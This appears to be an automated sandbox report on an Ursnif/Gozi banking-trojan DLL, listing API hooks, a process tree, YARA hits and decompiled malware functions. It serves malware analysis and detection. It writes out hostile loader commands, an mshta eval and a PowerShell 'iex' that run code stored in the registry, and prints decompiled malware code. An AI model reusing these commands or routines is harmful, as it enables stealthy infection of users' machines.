Feb 15, 2021 21:26:17.081238985 CET	151.101.1.44	443	192.168.2.5	49750	CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Wed Nov 25 01:00:00 CET 2020 Thu Sep 24 02:00:00 CEST 2020	Mon Dec 27 00:59:59 CET 2021 Tue Sep 24 01:59:59 CEST 2030	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Feb 15, 2021 21:26:17.081238985 CET	151.101.1.44	443	192.168.2.5	49750	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Thu Sep 24 02:00:00 CEST 2020	Tue Sep 24 01:59:59 CEST 2030		9e10692f1b7f78228b2d4e424db3a98c

Code Manipulations

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW	IAT	explorer.exe
api-ms-win-core-registry-l1-1-0.dll:RegGetValueW	IAT	explorer.exe
CreateProcessAsUserW	EAT	explorer.exe
CreateProcessAsUserW	INLINE	explorer.exe
CreateProcessW	EAT	explorer.exe
CreateProcessW	INLINE	explorer.exe
CreateProcessA	EAT	explorer.exe
CreateProcessA	INLINE	explorer.exe

Processes

Process: explorer.exe, Module: WININET.dll

Function Name	Hook Type	New Data
api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW	IAT	7FFA9B335200
api-ms-win-core-registry-l1-1-0.dll:RegGetValueW	IAT	721719C

Process: explorer.exe, Module: user32.dll

Function Name	Hook Type	New Data
api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW	IAT	7FFA9B335200
api-ms-win-core-registry-l1-1-0.dll:RegGetValueW	IAT	721719C

Process: explorer.exe, Module: KERNEL32.DLL

Function Name	Hook Type	New Data
CreateProcessAsUserW	EAT	7FFA9B33521C
CreateProcessAsUserW	INLINE	0xFF 0xF2 0x25 0x50 0x00 0x00
CreateProcessW	EAT	7FFA9B335200
CreateProcessW	INLINE	0xFF 0xF2 0x25 0x50 0x00 0x00
CreateProcessA	EAT	7FFA9B33520E
CreateProcessA	INLINE	0xFF 0xF2 0x25 0x50 0x00 0x00

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exe PID: 6432 Parent PID: 5628

General

Start time:	21:26:02
Start date:	15/02/2021
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe 'C:\Users\user\Desktop\NJPcHPuRcG.dll'
Imagebase:	0xc80000
File size:	121856 bytes
MD5 hash:	8081BC925DFC69D40463079233C90FA5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: regsvr32.exe PID: 6448 Parent PID: 6432

General

Start time:	21:26:02
Start date:	15/02/2021
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	regsvr32.exe /s C:\Users\user\Desktop\NJPcHPuRcG.dll
Imagebase:	0x230000
File size:	20992 bytes
MD5 hash:	426E7499F6A7346F0410DEAD0805586B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.395542546.00000000042F0000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.328188279.0000000004F38000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.328320558.0000000004F38000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.328226726.0000000004F38000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.328337032.0000000004F38000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.328359150.0000000004F38000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.328350143.0000000004F38000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.328266588.0000000004F38000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.328300905.0000000004F38000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.336044765.0000000004DBB000.00000004.00000040.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 6456 Parent PID: 6432

General

Start time:	21:26:02
Start date:	15/02/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'
Imagebase:	0x150000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 6488 Parent PID: 6456

General

Start time:	21:26:03
Start date:	15/02/2021
Path:	C:\Program Files\internet explorer\iexplore.exe
Wow64 process (32bit):	false
Commandline:	C:\Program Files\Internet Explorer\iexplore.exe
Imagebase:	0x7ff6f6b80000
File size:	823560 bytes
MD5 hash:	6465CB92B25A7BC1DF8E01D8AC5E7596
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 6532 Parent PID: 6488

General

Start time:	21:26:04
Start date:	15/02/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6488 CREDAT:17410 /prefetch:2
Imagebase:	0x820000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 6968 Parent PID: 6488

General

Start time:	21:26:42
Start date:	15/02/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6488 CREDAT:82962 /prefetch:2
Imagebase:	0x820000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 1276 Parent PID: 6488

General

Start time:	21:26:45
Start date:	15/02/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6488 CREDAT:17422 /prefetch:2
Imagebase:	0x820000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 1752 Parent PID: 6488

General

Start time:	21:26:49
Start date:	15/02/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6488 CREDAT:17430 /prefetch:2
Imagebase:	0x820000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: mshta.exe PID: 4676 Parent PID: 3472

General

Start time:	21:26:56
Start date:	15/02/2021
Path:	C:\Windows\System32\mshta.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
Imagebase:	0x7ff667ba0000
File size:	14848 bytes
MD5 hash:	197FC97C6A843BEBB445C1D9C58DCBDB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: powershell.exe PID: 5140 Parent PID: 4676

General

Start time:	21:26:58
Start date:	15/02/2021
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Imagebase:	0x7ff7a7ef0000
File size:	447488 bytes
MD5 hash:	95000560239032BC68B4C2FDFCDEF913
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000019.00000003.401552845.000001BFEB270000.00000004.00000001.sdmp, Author: Joe Security Rule: GoziRule, Description: Win32.Gozi, Source: 00000019.00000003.401552845.000001BFEB270000.00000004.00000001.sdmp, Author: CCN-CERT
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 5148 Parent PID: 5140

General

Start time:	21:26:59
Start date:	15/02/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7ecfc0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: csc.exe PID: 5724 Parent PID: 5140

General

Start time:	21:27:07
Start date:	15/02/2021
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\mu1rnx1a\mu1rnx1a.cmdline'
Imagebase:	0x7ff7e9cb0000
File size:	2739304 bytes
MD5 hash:	B46100977911A0C9FB1C3E5F16A5017D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	moderate

Chronological Activities

Analysis Process: cvtres.exe PID: 1268 Parent PID: 5724

General

Start time:	21:27:09
Start date:	15/02/2021
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES78AB.tmp' 'c:\Users\user\AppData\Local\Temp\mu1rnx1a\CSC6647FE8FE542539CE2919E5B6D2D1D.TMP'
Imagebase:	0x7ff7a8450000
File size:	47280 bytes
MD5 hash:	33BB8BE0B4F547324D93D5D2725CAC3D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: csc.exe PID: 6968 Parent PID: 5140

General

Start time:	21:27:13
Start date:	15/02/2021
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\yacmzdf3\yacmzdf3.cmdline'
Imagebase:	0x7ff7e9cb0000
File size:	2739304 bytes
MD5 hash:	B46100977911A0C9FB1C3E5F16A5017D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Chronological Activities

Analysis Process: cvtres.exe PID: 4192 Parent PID: 6968

General

Start time:	21:27:14
Start date:	15/02/2021
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES8CA0.tmp' 'c:\Users\user\AppData\Local\Temp\yacmzdf3\CSCE6DA2C7C1B814D8F891E10CFF0A5BBCE.TMP'
Imagebase:	0x7ff7a8450000
File size:	47280 bytes
MD5 hash:	33BB8BE0B4F547324D93D5D2725CAC3D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: control.exe PID: 6768 Parent PID: 6448

General

Start time:	21:27:17
Start date:	15/02/2021
Path:	C:\Windows\System32\control.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\control.exe -h
Imagebase:	0x7ff667820000
File size:	117760 bytes
MD5 hash:	625DAC87CB5D7D44C5CA1DA57898065F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: rundll32.exe PID: 5052 Parent PID: 6768

General

Start time:	21:27:21
Start date:	15/02/2021
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Imagebase:	0x7ff647450000
File size:	69632 bytes
MD5 hash:	73C519F050C20580F8A62C849D49215A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: explorer.exe PID: 3472 Parent PID: 5140

General

Start time:	21:27:23
Start date:	15/02/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:
Imagebase:	0x7ff693d90000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: regsvr32.exe PID: 6448 Parent PID: 6432 regsvr32.exeCOMMON

Executed Functions

Function 0540CCD9, Relevance: 47.6, APIs: 25, Strings: 2, Instructions: 316memorylibrarynativeCOMMON

Download Yara Rule

APIs

RtlInitializeCriticalSection.NTDLL(0542E288), ref: 0540CCF7

Part of subcall function 054203DD: RtlAllocateHeap.NTDLL(00000000,00000001,054211E1), ref: 054203E9

memset.NTDLL ref: 0540CD28
RtlInitializeCriticalSection.NTDLL(05958D20), ref: 0540CD39

Part of subcall function 054237D8: RtlInitializeCriticalSection.NTDLL(0542E260), ref: 054237FC
Part of subcall function 054237D8: RtlInitializeCriticalSection.NTDLL(0542E240), ref: 05423812
Part of subcall function 054237D8: GetVersion.KERNEL32(?,?,?,?,?,?,?,?,0540202D,?), ref: 05423823
Part of subcall function 054237D8: GetModuleHandleA.KERNEL32(0542F01D,?,?,?,?,?,?,?,?,0540202D,?), ref: 05423850

Part of subcall function 05426025: RtlAllocateHeap.NTDLL(00000000,-00000003,77A19EB0), ref: 0542603F

CreateMutexA.KERNELBASE(00000000,00000001,00000000,00000060,?,?,?,?,?,?,?,?,0540202D,?), ref: 0540CD62
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,0540202D,?), ref: 0540CD73
CloseHandle.KERNEL32(00000308,?,?,?,?,?,?,?,?,0540202D,?), ref: 0540CD87
GetUserNameA.ADVAPI32(00000000,?), ref: 0540CDD0
RtlAllocateHeap.NTDLL(00000000,?), ref: 0540CDE3
GetUserNameA.ADVAPI32(00000000,?), ref: 0540CDF8
NtQueryInformationProcess.NTDLL(00000000,?,00000018,?), ref: 0540CE28
OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,?,?,?,?,0540202D,?), ref: 0540CE3D
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,0540202D,?), ref: 0540CE47
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,0540202D,?), ref: 0540CE51
GetShellWindow.USER32 ref: 0540CE6C
GetWindowThreadProcessId.USER32(00000000), ref: 0540CE73
CreateEventA.KERNEL32(0542E0E4,00000001,00000000,00000000,61636F4C,00000001,?,?), ref: 0540CF02
RtlAllocateHeap.NTDLL(00000000,00000018,61636F4C), ref: 0540CF2C
OpenEventA.KERNEL32(00100000,00000000,059589B8,?,?,?,?,?,?,?,?,0540202D,?), ref: 0540CF54
CreateEventA.KERNEL32(0542E0E4,00000001,00000000,059589B8,?,?,?,?,?,?,?,?,0540202D,?), ref: 0540CF67
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,0540202D,?), ref: 0540CF6D
GetLastError.KERNEL32(054022B8,0542E05C,0542E060,?,?,?,?,?,?,?,?,0540202D,?), ref: 0540CFF3
LoadLibraryA.KERNEL32(ADVAPI32.DLL,054022B8,0542E05C,0542E060,?,?,?,?,?,?,?,?,0540202D,?), ref: 0540D007
SetEvent.KERNEL32(?,05407134,00000000,00000000,?,?,?,?,?,?,?,?,0540202D,?), ref: 0540D07B
RtlAllocateHeap.NTDLL(00000000,00000052,05407134), ref: 0540D090
wsprintfA.USER32 ref: 0540D0C0

Strings

0123456789ABCDEF, xrefs: 0540CD40
ADVAPI32.DLL, xrefs: 0540D002

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: AllocateHeap$CriticalErrorEventInitializeLastSection$CreateHandleProcess$CloseNameOpenUserWindow$InformationLibraryLoadModuleMutexQueryShellThreadVersionmemsetwsprintf
String ID: 0123456789ABCDEF$ADVAPI32.DLL
API String ID: 204107308-803475220
Opcode ID: d3813129eabd3fdaa768365118a75f002b9a61d3449e438a0e91c983d80e9ecb
Instruction ID: dbb544668bfb40d93f2c58f059844ec96864fe90e080c12df70907eb1ce3a5ec
Opcode Fuzzy Hash: d3813129eabd3fdaa768365118a75f002b9a61d3449e438a0e91c983d80e9ecb
Instruction Fuzzy Hash: B9B1A070A14334DFC724DF65D8869EB7FA9FB44700BA1592FF546C2280CB7098568B66

Uniqueness

Uniqueness Score: -1.00%

Function 02773512, Relevance: 34.7, APIs: 23, Instructions: 222
memoryfiletimeCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E02773512(signed char* __eax, intOrPtr* _a4) {
				signed int _v12;
				void* _v16;
				CHAR* _v20;
				struct _FILETIME _v28;
				void* _v32;
				void* _v36;
				char* _v40;
				signed int _v44;
				long _v344;
				struct _WIN32_FIND_DATAA _v368;
				signed int _t72;
				void* _t74;
				signed int _t76;
				void* _t78;
				intOrPtr _t81;
				CHAR* _t83;
				void* _t85;
				signed char _t89;
				signed char _t91;
				intOrPtr _t93;
				void* _t96;
				long _t99;
				int _t101;
				signed int _t109;
				char* _t111;
				void* _t113;
				int _t119;
				char _t128;
				void* _t134;
				signed int _t136;
				char* _t139;
				signed int _t140;
				char* _t141;
				char* _t146;
				signed char* _t148;
				int _t151;
				void* _t152;
				void* _t153;
				void* _t154;
				void* _t165;

				_v12 = _v12 & 0x00000000;
				_t148 = __eax;
				_t72 =  *0x277d22c; // 0x63699bc3
				_t74 = RtlAllocateHeap( *0x277d1f0, 0, _t72 ^ 0x63699ac7);
				_v20 = _t74;
				if(_t74 == 0) {
					L36:
					return _v12;
				}
				_t76 =  *0x277d22c; // 0x63699bc3
				_t78 = RtlAllocateHeap( *0x277d1f0, 0, _t76 ^ 0x63699bce);
				_t146 = 0;
				_v36 = _t78;
				if(_t78 == 0) {
					L35:
					HeapFree( *0x277d1f0, _t146, _v20);
					goto L36;
				}
				_t136 =  *0x277d22c; // 0x63699bc3
				memset(_t78, 0, _t136 ^ 0x63699bce);
				_t81 =  *0x277d230; // 0x27ba5a8
				_t154 = _t153 + 0xc;
				_t5 = _t81 + 0x277e825; // 0x73797325
				_t83 = E0277A590(_t5);
				_v20 = _t83;
				if(_t83 == 0) {
					L34:
					HeapFree( *0x277d1f0, _t146, _v36);
					goto L35;
				}
				_t134 = 0xffffffffffffffff;
				_v28.dwLowDateTime = 0x63699bce;
				_v28.dwHighDateTime = 0x63699bce;
				_t85 = CreateFileA(_t83, 0x80000000, 1, 0, 3, 0x80, 0); // executed
				_v32 = _t85;
				if(_t85 != 0x63699bce) {
					GetFileTime(_t85,  &_v28, 0, 0);
					_v28.dwLowDateTime = _v28.dwLowDateTime + 0x2a69c000;
					asm("adc dword [ebp-0x14], 0xc9"); // executed
					FindCloseChangeNotification(_v32); // executed
				}
				 *(StrRChrA(_v20, _t146, 0x5c)) = 0;
				_t89 = 0x3c6ef35f +  *_t148 * 0x19660d;
				_t91 = 0x3c6ef35f + _t89 * 0x19660d;
				 *_t148 = _t91;
				_v32 = _t91 & 0x000000ff;
				_t93 =  *0x277d230; // 0x27ba5a8
				_t16 = _t93 + 0x277e846; // 0x642e2a5c
				_v40 = _t146;
				_v44 = _t89 & 0x000000ff;
				__imp__(_v20, _t16);
				_t96 = FindFirstFileA(_v20,  &_v368); // executed
				_v16 = _t96;
				if(_t96 == _t134) {
					_t146 = 0;
					goto L34;
				}
				_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
				while(_t99 > 0) {
					_t101 = FindNextFileA(_v16,  &_v368); // executed
					if(_t101 == 0) {
						FindClose(_v16);
						_v16 = FindFirstFileA(_v20,  &_v368);
						_v28.dwHighDateTime = _v344;
						_v28.dwLowDateTime = _v368.ftLastWriteTime.dwLowDateTime;
					}
					_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
				}
				_v12 = _v12 & 0x00000000;
				while(1) {
					_t109 = _v44;
					if(_v12 <= _t109) {
						goto L15;
					}
					_t140 = _v12;
					if(_t140 > _v32) {
						_t141 = _v36;
						 *_a4 = _t141;
						while(1) {
							_t128 =  *_t141;
							if(_t128 == 0) {
								break;
							}
							if(_t128 < 0x30) {
								 *_t141 = _t128 + 0x20;
							}
							_t141 = _t141 + 1;
						}
						_v12 = 1;
						FindClose(_v16); // executed
						_t146 = 0;
						goto L35;
					}
					_t165 = _t140 - _t109;
					L15:
					if(_t165 == 0 || _v12 == _v32) {
						_t111 = StrChrA( &(_v368.cFileName), 0x2e);
						_t139 = _v40;
						_t151 = _t111 -  &(_v368.cFileName);
						_t113 = 0;
						if(_t139 != 0) {
							_t48 = _t151 - 4; // -4
							_t113 = _t48;
							if(_t113 > _t151) {
								_t113 = 0;
							}
						}
						if(_t151 > 4) {
							_t151 = 4;
						}
						memcpy(_v36 + _t139, _t152 + _t113 - 0x140, _t151);
						_t154 = _t154 + 0xc;
						_v40 =  &(_v40[_t151]);
					}
					do {
						_t119 = FindNextFileA(_v16,  &_v368); // executed
						if(_t119 == 0) {
							FindClose(_v16);
							_v16 = FindFirstFileA(_v20,  &_v368);
						}
					} while (CompareFileTime( &(_v368.ftLastWriteTime),  &_v28) > 0);
					_v12 = _v12 + 1;
				}
			}

0x0277351b
0x02773521
0x02773523
0x0277353d
0x02773541
0x02773544
0x027737b9
0x027737c0
0x027737c0
0x0277354a
0x0277355f
0x02773561
0x02773565
0x02773568
0x027737a9
0x027737b3
0x00000000
0x027737b3
0x0277356e
0x02773579
0x0277357e
0x02773583
0x02773586
0x0277358d
0x02773594
0x02773597
0x02773799
0x027737a3
0x00000000
0x027737a3
0x027735ad
0x027735b1
0x027735b4
0x027735b7
0x027735bf
0x027735c2
0x027735cb
0x027735d1
0x027735db
0x027735e2
0x027735e2
0x027735f4
0x027735ff
0x0277360d
0x02773612
0x02773617
0x0277361a
0x0277361f
0x02773629
0x0277362c
0x0277362f
0x02773645
0x02773649
0x0277364c
0x02773797
0x00000000
0x02773797
0x02773663
0x027736b4
0x02773677
0x0277367f
0x02773684
0x02773692
0x0277369b
0x027736a4
0x027736a4
0x027736b2
0x027736b2
0x027736b8
0x027736bc
0x027736bc
0x027736c2
0x00000000
0x00000000
0x027736c4
0x027736ca
0x02773771
0x02773774
0x02773781
0x02773781
0x02773785
0x00000000
0x00000000
0x0277377a
0x0277377e
0x0277377e
0x02773780
0x02773780
0x0277378a
0x02773791
0x02773793
0x00000000
0x02773793
0x027736d0
0x027736d2
0x027736d2
0x027736e5
0x027736eb
0x027736f6
0x027736f8
0x027736fc
0x027736fe
0x027736fe
0x02773703
0x02773705
0x02773705
0x02773703
0x0277370a
0x0277370e
0x0277370e
0x0277371e
0x02773723
0x02773726
0x02773726
0x02773729
0x02773733
0x0277373b
0x02773740
0x0277374e
0x0277374e
0x02773762
0x02773766
0x02773766

APIs

RtlAllocateHeap.NTDLL(00000000,63699BC3,0277D2E0), ref: 0277353D
RtlAllocateHeap.NTDLL(00000000,63699BC3), ref: 0277355F
memset.NTDLL ref: 02773579

Part of subcall function 0277A590: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,?,63699BCE,02773592,73797325), ref: 0277A5A1
Part of subcall function 0277A590: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 0277A5BB

CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 027735B7
GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 027735CB
FindCloseChangeNotification.KERNELBASE(?), ref: 027735E2
StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 027735EE
lstrcat.KERNEL32(?,642E2A5C), ref: 0277362F
FindFirstFileA.KERNELBASE(?,?), ref: 02773645
CompareFileTime.KERNEL32(?,?), ref: 02773663
FindNextFileA.KERNELBASE(027770B5,?), ref: 02773677
FindClose.KERNEL32(027770B5), ref: 02773684
FindFirstFileA.KERNEL32(?,?), ref: 02773690
CompareFileTime.KERNEL32(?,?), ref: 027736B2
StrChrA.SHLWAPI(?,0000002E), ref: 027736E5
memcpy.NTDLL(0277533C,?,00000000), ref: 0277371E
FindNextFileA.KERNELBASE(027770B5,?), ref: 02773733
FindClose.KERNEL32(027770B5), ref: 02773740
FindFirstFileA.KERNEL32(?,?), ref: 0277374C
CompareFileTime.KERNEL32(?,?), ref: 0277375C
FindClose.KERNELBASE(027770B5), ref: 02773791
HeapFree.KERNEL32(00000000,0277533C,73797325), ref: 027737A3
HeapFree.KERNEL32(00000000,?), ref: 027737B3

Memory Dump Source

Source File: 00000002.00000002.445632786.0000000002771000.00000020.00000001.sdmp, Offset: 02770000, based on PE: true

Associated: 00000002.00000002.445623558.0000000002770000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445653036.000000000277C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.445663216.000000000277D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445680180.000000000277F000.00000002.00000001.sdmp Download File

Similarity

API ID: File$Find$CloseHeapTime$CompareFirst$AllocateEnvironmentExpandFreeNextStrings$ChangeCreateNotificationlstrcatmemcpymemset
String ID:
API String ID: 2944988578-0
Opcode ID: 12e3089a920f92275e7cf496ab7ea696be8bf63f91fcb648c51191f6d85fb224
Instruction ID: 57d0718737c3c492f810b7fff1fe091a0f8ac7c7a3d05678c8a6d882b7877a24
Opcode Fuzzy Hash: 12e3089a920f92275e7cf496ab7ea696be8bf63f91fcb648c51191f6d85fb224
Instruction Fuzzy Hash: 19813BB1D00109AFDF21DFA5DC84AEEBBB9FF48304F1045AAE515E6250E7319A58DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 027712E8, Relevance: 13.6, APIs: 9, Instructions: 72
filetimeCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E027712E8(intOrPtr __edx, void** _a4, void** _a8) {
				intOrPtr _v8;
				struct _FILETIME* _v12;
				short _v56;
				struct _FILETIME* _t12;
				intOrPtr _t13;
				void* _t17;
				void* _t21;
				intOrPtr _t27;
				long _t28;
				void* _t30;

				_t27 = __edx;
				_t12 =  &_v12;
				GetSystemTimeAsFileTime(_t12);
				_push(0x192);
				_push(0x54d38000);
				_push(_v8);
				_push(_v12);
				L0277AEDA();
				_push(_t12);
				_v12 = _t12;
				_t13 =  *0x277d230; // 0x27ba5a8
				_t5 = _t13 + 0x277e84d; // 0x4f38df5
				_t6 = _t13 + 0x277e580; // 0x530025
				_push(0x16);
				_push( &_v56);
				_v8 = _t27;
				L0277ABFA();
				_t17 = CreateFileMappingW(0xffffffff, 0x277d234, 4, 0, 0x1000,  &_v56); // executed
				_t30 = _t17;
				if(_t30 == 0) {
					_t28 = GetLastError();
				} else {
					if(GetLastError() == 0xb7) {
						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
						if(_t21 == 0) {
							_t28 = GetLastError();
							if(_t28 != 0) {
								goto L6;
							}
						} else {
							 *_a4 = _t30;
							 *_a8 = _t21;
							_t28 = 0;
						}
					} else {
						_t28 = 2;
						L6:
						CloseHandle(_t30);
					}
				}
				return _t28;
			}

0x027712e8
